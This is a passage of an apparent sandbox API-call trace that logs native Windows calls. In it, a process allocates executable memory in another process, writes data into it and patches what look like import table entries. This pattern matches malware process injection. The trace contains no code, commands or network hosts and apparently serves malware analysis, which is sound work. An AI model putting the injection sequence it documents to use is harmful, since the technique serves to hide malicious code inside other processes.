NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.352] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.352] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.352] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.352] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.353] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.353] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.353] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.353] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a410, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.353] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.353] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949950*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949950*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.353] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.353] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.354] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.354] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.354] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.354] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.354] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.354] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.354] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.354] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.354] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.354] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.355] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a418, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.355] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.355] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94991a*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94991a*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.355] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.355] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.355] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.355] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.356] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.356] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.356] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.356] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.356] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.356] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.356] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.356] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.356] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a420, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.356] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949cb4, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="KERNEL32.dll") returned 13 [0140.356] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.357] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x19) returned 0x0 [0140.357] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.357] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.357] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.357] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.357] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.357] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.357] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.358] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.358] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.358] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.358] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20029, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.358] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.358] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.358] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f6a*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f6a*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.358] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.358] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.359] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.359] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.359] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.359] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.359] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.359] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.359] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.359] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.360] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.360] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.360] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a078, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.360] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.360] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c9c*, NumberOfBytesToWrite=0x18, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c9c*, NumberOfBytesWritten=0x28df88*=0x18) returned 0x0 [0140.360] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.360] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.360] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.361] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.361] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.361] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.361] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.361] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.361] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.361] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.361] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20028, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.361] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.362] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a080, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.362] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.362] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c86*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c86*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0140.362] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.362] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.362] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.362] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.362] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.363] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.363] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.363] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.363] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.363] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.363] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.363] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.363] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a088, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.364] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.364] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c70*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c70*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0140.364] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.364] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.364] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.364] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.364] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.365] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.365] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.365] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.365] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.365] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.365] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.365] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.365] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a090, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.365] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.366] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c60*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c60*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.366] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.366] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.366] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.366] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.366] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, 